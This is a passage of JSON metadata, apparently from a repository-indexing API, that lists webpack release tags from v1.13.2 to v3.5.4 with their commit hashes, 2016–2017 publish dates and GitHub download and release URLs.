","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_ur